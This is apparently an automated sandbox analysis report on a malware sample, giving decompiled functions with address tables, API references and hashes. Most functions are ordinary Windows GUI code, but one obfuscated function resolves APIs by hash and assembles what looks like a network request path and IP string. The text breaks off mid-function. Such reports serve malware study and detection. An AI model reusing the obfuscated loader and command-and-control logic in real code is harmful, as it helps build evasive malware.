API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction ID: ef1768683ce44c7a55569678311ee6e18f6548819425519884899f5cccb4810e
Opcode Fuzzy Hash: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction Fuzzy Hash: 023142B35052147FD7313F765C9483BB79CE649358B59093BF482E32C2EA3A8C4286AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041518D, Relevance: 12.1, APIs: 8, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041518D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				int _t56;
				intOrPtr* _t57;
				signed short _t62;
				void* _t63;
				void* _t67;
				intOrPtr* _t80;
				signed int _t83;
				struct HWND__* _t86;
				void* _t87;

				_t67 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a16 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t56 = GetTopWindow( *(_t67 + 0x1c));
				_t86 = _t56;
				while(_t86 != 0) {
					_t62 = GetDlgCtrlID(_t86);
					_push(_t86);
					_t83 = _t62 & 0x0000ffff;
					_t63 = E00413767();
					if(_t83 != _a12) {
						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
							SendMessageA(_t86, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t86;
					}
					_t56 = GetWindow(_t86, 2);
					_t86 = _t56;
				}
				if(_a16 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t57 = E00413740(_t87, _v8);
						if(_a16 == 2) {
							_t80 = _a20;
							_v36.left = _v36.left +  *_t80;
							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
						}
						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
						_t56 = E004152C7( &_v40, _v8,  &_v36);
					}
					if(_v40 != 0) {
						_t56 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t56 = _a20;
						 *((intOrPtr*)(_t56 + 8)) = _v20;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
					} else {
						_t56 = CopyRect(_a20,  &_v36);
					}
				}
				return _t56;
			}

0x00415198
0x004151a2
0x004151a5
0x004151a8
0x004151ab
0x004151ae
0x004151c0
0x004151b0
0x004151b3
0x004151b4
0x004151b5
0x004151b6
0x004151b6
0x004151ca
0x004151d9
0x004151cc
0x004151d4
0x004151d4
0x004151e0
0x004151e6
0x004151ea
0x004151ef
0x004151f5
0x004151f6
0x004151f9
0x00415201
0x0041520b
0x00415221
0x00415221
0x00415203
0x00415203
0x00415203
0x0041522a
0x00415230
0x00415230
0x00415238
0x00415267
0x00415271
0x0041527a
0x0041527c
0x00415281
0x00415287
0x0041528d
0x00415293
0x00415293
0x0041529f
0x004152ad
0x004152ad
0x004152b5
0x004152ba
0x004152ba
0x0041523a
0x0041523d
0x0041524e
0x00415254
0x0041525a
0x0041525d
0x0041525f
0x0041523f
0x00415246
0x00415246
0x0041523d
0x004152c4

APIs

GetClientRect.USER32 ref: 004151C0
BeginDeferWindowPos.USER32 ref: 004151CE
GetTopWindow.USER32(?), ref: 004151E0
GetDlgCtrlID.USER32 ref: 004151EF
SendMessageA.USER32 ref: 00415221
GetWindow.USER32(00000000,00000002), ref: 0041522A
CopyRect.USER32 ref: 00415246

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction ID: 90a1176f2728ed92b7e018f664d1b63403b8a41a4a5cc89754fcf96d7c9d9e63
Opcode Fuzzy Hash: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction Fuzzy Hash: D8418D72D00609EFCF15DF94D8848EEB7B5FF49304B1480AAE901A7251C738AE81CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041264E, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041264E(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x98);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x94);
							if( *(_t35 + 0x94) != 0) {
								E0041A92B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x94) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0041A92B( *(_t35 + 0x94));
								 *(_t35 + 0x94) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x00412651
0x00412654
0x00412659
0x00412661
0x0041267a
0x00412682
0x0041268c
0x00412693
0x00412695
0x0041269d
0x004126a0
0x004126a0
0x004126b7
0x004126be
0x004126d9
0x004126e1
0x004126e6
0x004126e6
0x004126ef
0x004126ef
0x00412693
0x00412682
0x004126f8

APIs

GlobalLock.KERNEL32 ref: 0041266E
lstrcmpA.KERNEL32(?,?), ref: 0041267A
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041268C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126AF
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126B7
GlobalLock.KERNEL32 ref: 004126C4
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004126D1
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004126EF

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction ID: e892e9459afc7c616b27fd268aebf896f546ff29830f707e5cbc297c1b476139
Opcode Fuzzy Hash: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction Fuzzy Hash: 4011E771200104BEDB21AB76CD4AEAF7BBDEF85704F00042EF608D1152D7799DA1D728

Uniqueness

Uniqueness Score: -1.00%

Function 0042322D, Relevance: 12.1, APIs: 8, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042322D(intOrPtr __ecx) {
				int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				int _t35;
				long _t39;
				intOrPtr _t40;
				int _t42;
				void* _t43;

				_v12 = __ecx;
				_v8 = GetSystemMetrics(6);
				_t39 = GetSystemMetrics(5);
				_t35 = GetSystemMetrics(0x21);
				_t42 = GetSystemMetrics(0x20);
				_v28.top = _v8;
				_t24 =  *0x439c98; // 0x0
				_v28.left = _t39;
				_v28.right = _t24 - _t39;
				_t26 =  *0x439c9c; // 0x0
				_v28.bottom = _t26;
				if((E00416528(_v12) & 0x00040600) != 0) {
					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
				}
				_t40 = _v12;
				_push(GetWindowDC( *(_t40 + 0x1c)));
				_t43 = E00419BA2();
				InvertRect( *(_t43 + 4),  &_v28);
				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
			}

0x0042323c
0x00423245
0x0042324c
0x00423252
0x00423256
0x0042325e
0x00423261
0x00423266
0x0042326b
0x0042326e
0x00423273
0x00423280
0x0042328d
0x0042328d
0x00423293
0x0042329f
0x004232a5
0x004232ae
0x004232c4

APIs

GetSystemMetrics.USER32 ref: 00423241
GetSystemMetrics.USER32 ref: 00423248
GetSystemMetrics.USER32 ref: 0042324E
GetSystemMetrics.USER32 ref: 00423254

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

OffsetRect.USER32(?,00000000,?), ref: 0042328D
GetWindowDC.USER32(?,?,?,?), ref: 00423299
InvertRect.USER32(?,?), ref: 004232AE
ReleaseDC.USER32 ref: 004232BA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
String ID:
API String ID: 2500086165-0
Opcode ID: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction ID: 7c5e0aa81d449cf31b82ccaaec63d8c78fb3c057318de3585a12a8b43351a0d8
Opcode Fuzzy Hash: ba394ea1607188f933521b8238ab893581fe33d6a53f651306307ae79d27d4b5
Instruction Fuzzy Hash: 4A112B72E00218ABCB10DFF9ED4999EBFB8EF44350F104166EA05E3250D775AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 021E12B0, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E021E12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x21edea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E021E3E80(_t191, E021E3F20(0xbb398380), 0x97f883e, _t278);
									 *0x21edea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x21ee1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E021E3E80(_t191, E021E3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x21ee1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E021E1FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E021E4ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E021E4250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E021E4250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x21edd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E021E3E80(_t191, E021E3F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x21edd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E021E1950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E021E34C0(0x21ed0e0);
												_t182 =  *0x21edc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E021E3E80(_t191, E021E3F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x21edc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E021E3460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E021E4250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E021E42F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E021E57E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E021E4250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E021E1E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E021E34C0(0x21ed080);
									_t274 =  *0x21edc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E021E3E80(_t191, E021E3F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x21edc60 = _t274;
									}
									_t243 =  *( *0x21ee2e0 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E021E3460(_t266);
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 = ( *( *0x21ee2e0 + 0xc))[4] & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E021E42F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E021E5BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x21edea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E021E3E80(_t191, E021E3F20(0xbb398380), 0x97f883e, _t278);
									 *0x21edea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x21ee1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E021E3E80(_t191, E021E3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x21ee1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E021E4250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E021E2290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E021E1C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E021E2C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x021e12b0
0x021e12b8
0x021e12c0
0x021e12c2
0x021e12c6
0x021e12c8
0x021e12cc
0x021e12d0
0x021e12d5
0x021e12d9
0x021e12dd
0x021e12e1
0x021e12e1
0x021e12e1
0x021e12e8
0x021e12f0
0x021e12f0
0x021e12f0
0x021e12f0
0x021e12f5
0x00000000
0x00000000
0x021e12fb
0x021e1589
0x021e158e
0x021e1590
0x021e15a3
0x021e15a8
0x021e15a8
0x021e15af
0x021e15b1
0x021e15b6
0x021e15b8
0x021e15cb
0x021e15d0
0x021e15d0
0x021e15dc
0x021e15de
0x021e15e2
0x021e15e7
0x00000000
0x021e1301
0x021e1301
0x021e1306
0x021e148e
0x021e1493
0x021e1556
0x021e155b
0x00000000
0x021e1561
0x021e1569
0x021e156e
0x021e1574
0x021e1578
0x021e157f
0x00000000
0x021e157f
0x021e1499
0x021e1499
0x021e14e6
0x021e14fe
0x021e14fe
0x021e14ff
0x021e1510
0x021e151d
0x021e1523
0x021e1528
0x021e152b
0x021e152e
0x021e1531
0x021e1534
0x021e1534
0x021e1534
0x021e1537
0x021e153b
0x021e153b
0x021e153f
0x021e1545
0x021e1548
0x021e154d
0x00000000
0x021e149b
0x021e149b
0x021e14a0
0x021e14cb
0x021e14d0
0x021e14d4
0x021e14d9
0x00000000
0x021e14a2
0x021e14a2
0x021e14a7
0x021e1879
0x021e187b
0x021e1880
0x021e188e
0x00000000
0x00000000
0x00000000
0x021e14a7
0x021e14a0
0x021e1499
0x021e130c
0x021e130c
0x021e1452
0x021e1457
0x021e1459
0x021e146c
0x021e1471
0x021e1471
0x021e1476
0x021e1478
0x021e147c
0x021e1480
0x021e1484
0x00000000
0x021e1312
0x021e1312
0x021e1317
0x021e1414
0x021e1419
0x00000000
0x021e141f
0x021e142f
0x021e1434
0x021e1438
0x021e143b
0x021e1441
0x021e1448
0x00000000
0x021e1448
0x021e131d
0x021e131d
0x021e13b5
0x021e13b7
0x021e13bc
0x021e13be
0x021e13d1
0x021e13d6
0x021e13d6
0x021e13f6
0x021e13f8
0x021e13fd
0x021e1402
0x021e1406
0x021e140b
0x00000000
0x021e1323
0x021e1328
0x021e1394
0x021e1399
0x021e139d
0x021e13a2
0x00000000
0x021e132a
0x021e132f
0x00000000
0x021e1335
0x021e133b
0x021e1343
0x021e1345
0x021e1349
0x021e1353
0x021e135c
0x021e135d
0x021e1364
0x021e1369
0x021e136d
0x021e1371
0x021e1375
0x021e1375
0x021e137a
0x021e137a
0x021e137e
0x021e1382
0x021e1387
0x00000000
0x021e1387
0x021e132f
0x021e1328
0x021e131d
0x021e1317
0x021e130c
0x021e1306
0x00000000
0x021e12fb
0x021e15f0
0x021e15f5
0x021e174c
0x021e1751
0x021e1845
0x021e184d
0x021e1855
0x021e1859
0x021e185e
0x021e1864
0x021e1868
0x021e186f
0x00000000
0x021e1757
0x021e1757
0x021e175c
0x021e17c0
0x021e17c5
0x021e17cb
0x021e17cd
0x021e17cf
0x021e17e7
0x021e17e9
0x021e17e9
0x021e17f5
0x021e1813
0x021e1815
0x021e181a
0x021e1824
0x021e1828
0x021e182c
0x021e1837
0x021e183b
0x00000000
0x021e175e
0x021e175e
0x021e1763
0x00000000
0x021e1769
0x021e1779
0x021e1782
0x021e1784
0x021e1788
0x021e178a
0x00000000
0x021e1790
0x021e1795
0x021e1796
0x021e179c
0x021e179e
0x021e17a1
0x021e17a5
0x021e17a7
0x00000000
0x021e17ad
0x021e17ad
0x021e17b1
0x00000000
0x021e17b1
0x021e17a7
0x021e178a
0x021e1763
0x021e175c
0x021e15fb
0x021e15fb
0x021e16e5
0x021e16ea
0x021e16ec
0x021e16ff
0x021e1704
0x021e1704
0x021e170b
0x021e170d
0x021e1712
0x021e1714
0x021e1727
0x021e172c
0x021e172c
0x021e1738
0x021e173a
0x021e173e
0x021e1743
0x00000000
0x021e1601
0x021e1601
0x021e1606
0x021e16bf
0x021e16c4
0x00000000
0x021e16ca
0x021e16ce
0x021e16d3
0x021e16d7
0x021e16dc
0x00000000
0x021e16dc
0x021e160c
0x021e160c
0x021e169f
0x021e16a4
0x021e16aa
0x021e16ae
0x021e16b5
0x00000000
0x021e1612
0x021e1612
0x021e1617
0x021e1680
0x021e1685
0x021e1689
0x021e168e
0x00000000
0x021e1619
0x021e1619
0x021e161e
0x00000000
0x021e1624
0x021e162c
0x021e1631
0x021e1639
0x021e1641
0x021e1649
0x021e1651
0x021e1656
0x021e165b
0x021e165f
0x021e1662
0x021e1668
0x021e166f
0x00000000
0x021e166f
0x021e161e
0x021e1617
0x021e160c
0x021e1606
0x021e15fb
0x00000000
0x021e14ad
0x021e14ad
0x021e14ad
0x021e14c6
0x00000000
0x021e14c6

Strings

E?*, xrefs: 021E1601
a7a&, xrefs: 021E1612
Ei, xrefs: 021E13C0
a7a&, xrefs: 021E1548
Ei, xrefs: 021E17D1

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-288907479
Opcode ID: 3bd03cf3bfc41e9f77c97d06ff9da8e0b2892259d0219ed95383e1a8cb6db223
Instruction ID: 762de2320ede5d189659877d236c666a989485b47daae322cfbca0179a649eb3
Opcode Fuzzy Hash: 3bd03cf3bfc41e9f77c97d06ff9da8e0b2892259d0219ed95383e1a8cb6db223
Instruction Fuzzy Hash: C9E1BD71684602ABCF18EF68DC90A6FB3E6ABC4744F14491DE46BDB340DB34ED458B92

Uniqueness

Uniqueness Score: -1.00%

Function 00415F1B, Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00415F1B(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = E004126FB() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(E004126FB())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E0041668C(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
